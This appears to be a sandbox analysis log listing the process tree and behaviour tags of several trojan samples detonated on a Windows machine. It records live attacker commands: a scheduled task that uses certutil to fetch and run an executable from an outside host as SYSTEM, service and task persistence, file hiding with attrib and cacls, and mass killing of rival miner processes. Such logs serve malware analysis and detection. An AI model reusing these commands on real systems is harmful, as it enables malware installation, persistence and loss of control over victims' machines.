C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://biggames.online/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F7⤵
- Scheduled Task/Job: Scheduled Task
PID:2216
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"7⤵
- Executes dropped EXE
PID:728
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\Sysnative\bcdedit.exe /v7⤵
- Modifies boot configuration data using bcdedit
PID:3276
-
-
-
-
-
-
-
C:\Users\Admin\Desktop\Trojan.Win32.NanoBot.rmj-96e78a7404f0a5713d809b9b4609cf12872c9efeb22c4ea95219737d93665bf9.exe"C:\Users\Admin\Desktop\Trojan.Win32.NanoBot.rmj-96e78a7404f0a5713d809b9b4609cf12872c9efeb22c4ea95219737d93665bf9.exe"1⤵
- Drops startup file
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of SendNotifyMessage
PID:1740 -
C:\Users\Admin\AppData\Local\Temp\mscongg.exe"C:\Users\Admin\AppData\Local\Temp\mscongg.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of SendNotifyMessage
PID:1940 -
C:\Users\Admin\AppData\Local\Temp\mscongg.exe"C:\Users\Admin\AppData\Local\Temp\mscongg.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: GetForegroundWindowSpam
PID:4952
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v2.0.50727\\\\RegAsm.exe"2⤵
- Checks whether UAC is enabled
- Suspicious behavior: GetForegroundWindowSpam
PID:4376
-
-
C:\Users\Admin\Desktop\Trojan-Spy.Win32.KeyLogger.brcj-85267066f82927ee6ed25de08fbd0a697ece1331542db9158d7baf69fa874655.exe"C:\Users\Admin\Desktop\Trojan-Spy.Win32.KeyLogger.brcj-85267066f82927ee6ed25de08fbd0a697ece1331542db9158d7baf69fa874655.exe"1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1148
-
C:\Users\Admin\Desktop\Trojan-Spy.Win32.Windigo.z-46ee7aa3a8e37caeafb8716ef015b48f5c319336e16c4772b7ddd50bd4e56bdf.exe"C:\Users\Admin\Desktop\Trojan-Spy.Win32.Windigo.z-46ee7aa3a8e37caeafb8716ef015b48f5c319336e16c4772b7ddd50bd4e56bdf.exe"1⤵
- Executes dropped EXE
PID:2340
-
C:\Users\Admin\Desktop\Trojan.Win32.Reconyc.jmjd-044d234d96ba4d2c8d6b75dce9f3b778137708ed2fd39edfab8711d3431f8763.exe"C:\Users\Admin\Desktop\Trojan.Win32.Reconyc.jmjd-044d234d96ba4d2c8d6b75dce9f3b778137708ed2fd39edfab8711d3431f8763.exe"1⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:248 -
C:\Windows\Fonts\Mysql\ctfmon.exe"C:\Windows\Fonts\Mysql\ctfmon.exe"2⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:2912 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Windows\Fonts\Mysql\same.bat" "3⤵
- Drops file in Drivers directory
PID:776 -
C:\Windows\SysWOW64\net.exenet stop "MicrosoftMysql"4⤵PID:4372
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "MicrosoftMysql"5⤵PID:2456
-
-
-
C:\Windows\SysWOW64\net.exenet stop "MicrosoftMssql"4⤵PID:1640
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "MicrosoftMssql"5⤵
- System Location Discovery: System Language Discovery
PID:2976
-
-
-
C:\Windows\Fonts\Mysql\svchost.exesvchost stop "MicrosoftFonts"4⤵
- Executes dropped EXE
PID:472
-
-
C:\Windows\Fonts\Mysql\svchost.exesvchost stop "MicrosoftMysql"4⤵
- Executes dropped EXE
PID:1964
-
-
C:\Windows\SysWOW64\sc.exesc delete "MicrosoftMysql"4⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:1208
-
-
C:\Windows\SysWOW64\sc.exesc delete "MicrosoftMssql"4⤵
- Launches sc.exe
PID:3428
-
-
C:\Windows\Fonts\Mysql\svchost.exesvchost install MicrosoftMysql "C:\Windows\Fonts\Mysql\cmd.bat"4⤵
- Executes dropped EXE
PID:1368
-
-
C:\Windows\Fonts\Mysql\svchost.exesvchost install MicrosoftMysql C:\Windows\Fonts\Mysql\cmd.bat4⤵
- Executes dropped EXE
PID:492
-
-
C:\Windows\Fonts\Mysql\svchost.exesvchost install "MicrosoftMysql" C:\Windows\Fonts\Mysql\cmd.bat4⤵
- Executes dropped EXE
PID:804
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 204⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4004
-
-
C:\Windows\Fonts\Mysql\svchost.exesvchost start "MicrosoftMysql"4⤵
- Executes dropped EXE
PID:2296
-
-
C:\Windows\SysWOW64\net.exenet start "MicrosoftMysql"4⤵PID:2456
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start "MicrosoftMysql"5⤵PID:2976
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:1640
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /TN "At1" /TR "C:\Windows\Fonts\Mysql\nei.bat" /SC daily /ST 11:30:00 /RU SYSTEM4⤵
- Scheduled Task/Job: Scheduled Task
PID:4696
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:2620
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /TN "At2" /TR "C:\Windows\Fonts\Mysql\wai.bat" /SC daily /ST 01:00:00 /RU SYSTEM4⤵
- Scheduled Task/Job: Scheduled Task
PID:1964
-
-
C:\Windows\SysWOW64\attrib.exeattrib +h +s -r C:\windows\tasks\At*.job4⤵
- Views/modifies file attributes
PID:2400
-
-
C:\Windows\SysWOW64\attrib.exeattrib +h +s -r C:\Windows\System32\Tasks\At*4⤵
- Views/modifies file attributes
PID:1488
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:4740
-
-
C:\Windows\SysWOW64\cacls.execacls C:\windows\tasks\At1.job /c /e /t /g system:F4⤵PID:3128
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:3664
-
-
C:\Windows\SysWOW64\cacls.execacls C:\windows\tasks\At2.job /c /e /t /g system:F4⤵PID:2844
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:4628
-
-
C:\Windows\SysWOW64\cacls.execacls C:\windows\tasks\At1.job /c /e /t /g everyone:F4⤵PID:1136
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:2020
-
-
C:\Windows\SysWOW64\cacls.execacls C:\windows\tasks\At2.job /c /e /t /g everyone:F4⤵PID:668
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:2292
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\System32\Tasks\At1 /c /e /t /g system:F4⤵PID:3256
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:5108
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\System32\Tasks\At2 /c /e /t /g system:F4⤵
- System Location Discovery: System Language Discovery
PID:1976
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:920
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\System32\Tasks\At1 /c /e /t /g everyone:F4⤵PID:5112
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:1592
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\System32\Tasks\At2 /c /e /t /g everyone:F4⤵PID:884
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:3708
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\Tasks\MiscfostNsi /p system:n4⤵PID:2560
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:792
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\Tasks\HomeGroupProvider /p system:n4⤵PID:4972
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:3872
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\Tasks\WwANsvc /p system:n4⤵PID:4832
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:2364
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\Tasks\*fost* /p system:n4⤵PID:3548
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:4076
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\Tasks\*Group* /p system:n4⤵PID:2132
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:2180
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\Tasks\*sa* /p system:n4⤵PID:3340
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:2792
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\Tasks\*ok* /p system:n4⤵PID:4648
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:5036
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\Tasks\*my* /p system:n4⤵PID:1572
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:4448
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\System32\Tasks\MiscfostNsi /p system:n4⤵PID:1956
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:2264
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\System32\Tasks\HomeGroupProvider /p system:n4⤵PID:4236
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:1968
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\System32\Tasks\WwANsvc /p system:n4⤵PID:4584
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:3356
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\System32\Tasks\*fost* /p system:n4⤵PID:4220
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
- System Location Discovery: System Language Discovery
PID:2032
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\System32\Tasks\*Group* /p system:n4⤵PID:3276
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:3404
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\System32\Tasks\*sa* /p system:n4⤵PID:2576
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:3668
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\System32\Tasks\*ok* /p system:n4⤵PID:2404
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:3560
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\System32\Tasks\*my* /p system:n4⤵PID:1988
-
-
C:\Windows\SysWOW64\sc.exesc start Schedule4⤵
- Launches sc.exe
PID:2716
-
-
C:\Windows\SysWOW64\net.exenet start Schedule4⤵PID:3516
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start Schedule5⤵PID:4580
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Eternalblue-2.2.0.exe4⤵
- Kills process with taskkill
PID:568
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Doublepulsar-1.3.1.exe4⤵
- Kills process with taskkill
PID:3632
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im one.exe4⤵
- Kills process with taskkill
PID:3456
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im z.exe4⤵
- Kills process with taskkill
PID:2912
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im c32.exe4⤵
- Kills process with taskkill
PID:4620
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im c64.exe4⤵
- Kills process with taskkill
PID:2456
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im service.exe4⤵
- Kills process with taskkill
PID:4696
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im 32.exe4⤵
- Kills process with taskkill
PID:1964
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im 64.exe4⤵
- Kills process with taskkill
PID:3664
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im lsazs.exe4⤵
- Kills process with taskkill
PID:1136
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome..exe4⤵
- Kills process with taskkill
PID:2176
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Cstr.exe4⤵
- Kills process with taskkill
PID:3872
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im srvany.exe4⤵
- Kills process with taskkill
PID:2168
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im CPUInfo.exe4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:1472
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im scvsots.exe4⤵
- Kills process with taskkill
PID:2792
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im acor.exe4⤵
- Kills process with taskkill
PID:4796
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im lsmosee.exe4⤵
- Kills process with taskkill
PID:1692
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im WUDHostServices.exe4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:2264
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im WUDHostService.exe4⤵
- Kills process with taskkill
PID:4072
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im lsmose.exe4⤵
- Kills process with taskkill
PID:3100
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im 1sass.exe4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:2032
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im mssecsvc.exe4⤵
- Kills process with taskkill
PID:912
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im mssecsvr.exe4⤵
- Kills process with taskkill
PID:3668
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im TasksHostServices.exe4⤵
- Kills process with taskkill
PID:2924
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im TasksHostService.exe4⤵
- Kills process with taskkill
PID:3064
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im crss.exe4⤵
- Kills process with taskkill
PID:4932
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im svsohst.exe4⤵
- Kills process with taskkill
PID:3516
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im seser.exe4⤵
- Kills process with taskkill
PID:568
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im msinfo.exe4⤵
- Kills process with taskkill
PID:3632
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im taskmgr.exe4⤵
- Kills process with taskkill
PID:772
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im csrs.exe4⤵
- Kills process with taskkill
PID:2412
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im path.exe4⤵
- Kills process with taskkill
PID:4768
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im spoolsrv.exe4⤵
- Kills process with taskkill
PID:1964
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im svschost.exe4⤵
- Kills process with taskkill
PID:2360
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im mscteui.exe4⤵
- Kills process with taskkill
PID:576
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im TrueServiceHost.exe4⤵
- Kills process with taskkill
PID:4372
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ServicesMgrHost.exe4⤵
- Kills process with taskkill
PID:5108
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im GoogleCdoeUpdate.exe4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:4416
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im TrustedHostex.exe4⤵
- Kills process with taskkill
PID:3936
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im svhost.exe4⤵
- Kills process with taskkill
PID:560
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im WUDFHosts.exe4⤵
- Kills process with taskkill
PID:4832
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im scvhost.exe4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:1492
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im csrse.exe4⤵
- Kills process with taskkill
PID:2044
-
-
C:\Windows\SysWOW64\net.exenet stop "mssecsvc2.1"4⤵PID:2168
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "mssecsvc2.1"5⤵PID:3340
-
-
-
C:\Windows\SysWOW64\net.exenet stop "mssecsvc2.0"4⤵PID:4848
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "mssecsvc2.0"5⤵PID:2804
-
-
-
C:\Windows\SysWOW64\net.exenet stop "lbpuamoqhpoqju171"4⤵PID:4448
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "lbpuamoqhpoqju171"5⤵PID:3984
-
-
-
C:\Windows\SysWOW64\sc.exesc stop "tjuldl"4⤵
- Launches sc.exe
PID:1956
-
-
C:\Windows\SysWOW64\sc.exesc stop "fastuserswitchingcompatibility"4⤵
- Launches sc.exe
PID:1692
-
-
C:\Windows\SysWOW64\sc.exesc stop "dbuxbr"4⤵
- Launches sc.exe
PID:2272
-
-
C:\Windows\SysWOW64\sc.exesc stop "mssecsvc2.1"4⤵
- Launches sc.exe
PID:3972
-
-
C:\Windows\SysWOW64\sc.exesc stop "mssecsvc2.0"4⤵
- Launches sc.exe
PID:2336
-
-
C:\Windows\SysWOW64\sc.exesc stop "lbpuamoqhpoqju171"4⤵
- Launches sc.exe
PID:1788
-
-
C:\Windows\SysWOW64\sc.exesc config "tjuldl" start= disabled4⤵
- Launches sc.exe
PID:3356
-
-
C:\Windows\SysWOW64\sc.exesc config "fastuserswitchingcompatibility" start= disabled4⤵
- Launches sc.exe
PID:2680
-
-
C:\Windows\SysWOW64\sc.exesc config "dbuxbr" start= disabled4⤵
- Launches sc.exe
PID:4220
-
-
C:\Windows\SysWOW64\sc.exesc config "mssecsvc2.1" start= disabled4⤵
- Launches sc.exe
PID:2332
-
-
C:\Windows\SysWOW64\sc.exesc config "mssecsvc2.0" start= disabled4⤵
- Launches sc.exe
PID:2032
-
-
C:\Windows\SysWOW64\sc.exesc config "lbpuamoqhpoqju171" start= disabled4⤵
- Launches sc.exe
PID:2648
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im mssecsvr.exe4⤵
- Kills process with taskkill
PID:2204
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im mssecsvc.exe4⤵
- Kills process with taskkill
PID:4076
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im tasksche.exe4⤵
- Kills process with taskkill
PID:1976
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWmic Process Where "Name='svchost.exe' And ExecutablePath='C:\\Windows\\Fonts\\Microsoft\\svchost.exe'" Call Terminate4⤵
- Kills process with WMI
PID:2804
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWmic Process Where "Name='taskhost.exe' And ExecutablePath='C:\\Windows\\Fonts\\Microsoft\\taskhost.exe'" Call Terminate4⤵
- System Location Discovery: System Language Discovery
- Kills process with WMI
PID:560
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWmic Process Where "Name='mssecsvr.exe' And ExecutablePath='C:\\Windows\\mssecsvr.exe'" Call Terminate4⤵
- Kills process with WMI
PID:5388
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWmic Process Where "Name='tasksche.exe' And ExecutablePath='C:\\Windows\\tasksche.exe'" Call Terminate4⤵
- Kills process with WMI
PID:5676
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWmic Process Where "Name='mssecsvc.exe' And ExecutablePath='C:\\WINDOWS\\mssecsvc.exe'" Call Terminate4⤵
- Kills process with WMI
PID:5916
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWmic Process Where "Name='tasksche.exe' And ExecutablePath='C:\\Windows\\tasksche.exe'" Call Terminate4⤵
- Kills process with WMI
PID:6104
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWmic Process Where "Name='mssecsvr.exe' And ExecutablePath='C:\\WINDOWS\\mssecsvr.exe'" Call Terminate4⤵
- Kills process with WMI
PID:6136
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWmic Process Where "Name='mssecsvc.exe' And ExecutablePath='C:\\WINDOWS\\mssecsvc.exe'" Call Terminate4⤵
- Kills process with WMI
PID:2336
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
- System Location Discovery: System Language Discovery
PID:5404
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\mssecsvr.exe /p system:n4⤵PID:2804
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:5744
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\mssecsvc.exe /p system:n4⤵PID:5676
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:5920
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\tasksche.exe /p system:n4⤵PID:5916
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:6124
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\qeriuwjhrf /p system:n4⤵PID:6104
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im conhosts.exe4⤵
- Kills process with taskkill
PID:6140
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im lsmose.exe4⤵
- Kills process with taskkill
PID:560
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im lsmosee.exe4⤵
- Kills process with taskkill
PID:5740
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWmic Process Where "Name='conhosts.exe' And ExecutablePath='C:\\Windows\\Temp\\conhosts.exe'" Call Terminate4⤵
- Kills process with WMI
PID:5700
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWmic Process Where "Name='conhost.exe' And ExecutablePath='C:\\Windows\\Temp\\conhost.exe'" Call Terminate4⤵
- Kills process with WMI
PID:6004
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWmic Process Where "Name='lsmosee.exe' And ExecutablePath='C:\\Windows\\help\\lsmosee.exe'" Call Terminate4⤵
- Kills process with WMI
PID:3824
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWmic Process Where "Name='lsmose.exe' And ExecutablePath='C:\\Windows\\help\\lsmose.exe'" Call Terminate4⤵
- Kills process with WMI
PID:6136
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWmic Process Where "Name='lsmosee.exe' And ExecutablePath='C:\\Windows\\debug\\lsmosee.exe'" Call Terminate4⤵
- Kills process with WMI
PID:4112
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWmic Process Where "Name='lsmose.exe' And ExecutablePath='C:\\Windows\\debug\\lsmose.exe'" Call Terminate4⤵
- Kills process with WMI
PID:4396
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWmic Process Where "Name='conime.exe' And ExecutablePath='C:\\Progra~1\\Common~1\\conime.exe'" Call Terminate4⤵
- Kills process with WMI
PID:1952
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r c:\windows\web\*.bat4⤵
- Sets file to hidden
- Views/modifies file attributes
PID:5020
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r C:\WINDOWS\Web\*.vbs4⤵
- Sets file to hidden
- Views/modifies file attributes
PID:3004
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r C:\WINDOWS\Debug\item.dat4⤵
- Sets file to hidden
- Views/modifies file attributes
PID:1956
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r C:\Windows\Temp\conhost.exe4⤵
- Sets file to hidden
- Views/modifies file attributes
PID:5000
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r C:\Windows\help\lsmose.exe4⤵
- Sets file to hidden
- Views/modifies file attributes
PID:4584
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:700
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\help\lsmosee.exe /p system:n4⤵PID:2016
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:4548
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\help\lsmose.exe /p system:n4⤵PID:4236
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:1956
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\debug\lsmosee.exe /p system:n4⤵PID:1336
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
- System Location Discovery: System Language Discovery
PID:3376
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\debug\lsmose.exe /p system:n4⤵PID:792
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:4584
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Progra~1\Common~1\conime.exe /p system:n4⤵PID:4428
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:2016
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\Temp\*.exe /p system:n4⤵PID:5156
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:5176
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\Temp\conhost.exe /p system:n4⤵PID:5192
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:4536
-
-
C:\Windows\SysWOW64\cacls.execacls c:\windows\web\*.bat /p system:n4⤵PID:5228
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:5244
-
-
C:\Windows\SysWOW64\cacls.execacls C:\WINDOWS\Web\*.vbs /p system:n4⤵PID:5252
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵
- System Location Discovery: System Language Discovery
PID:5276
-
-
C:\Windows\SysWOW64\cacls.execacls C:\WINDOWS\Debug\item.dat /p system:n4⤵PID:5288
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:4428
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\debug\xmrstak_cuda_backend.dll /p system:n4⤵PID:5408
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:5436
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\debug\xmrstak_opencl_backend.dll /p system:n4⤵PID:5448
-
-
C:\Windows\SysWOW64\attrib.exeattrib -r -h -s C:\ProgramData\clr_optimization_v4.0.30318_644⤵
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:5992
-
-
C:\Windows\SysWOW64\attrib.exeattrib -r -h -s C:\Documents and Settings\All Users\Application Data\clr_optimization_v4.0.30318_644⤵
- Views/modifies file attributes
PID:6056
-
-
C:\Windows\SysWOW64\attrib.exeattrib -r -h -s C:\ProgramData\clr_optimization_v4.0.30318_64\svchost.exe4⤵
- Views/modifies file attributes
PID:6028
-
-
C:\Windows\SysWOW64\attrib.exeattrib -r -h -s C:\Documents and Settings\All Users\Application Data\clr_optimization_v4.0.30318_64\svchost.exe4⤵
- Views/modifies file attributes
PID:6048
-
-
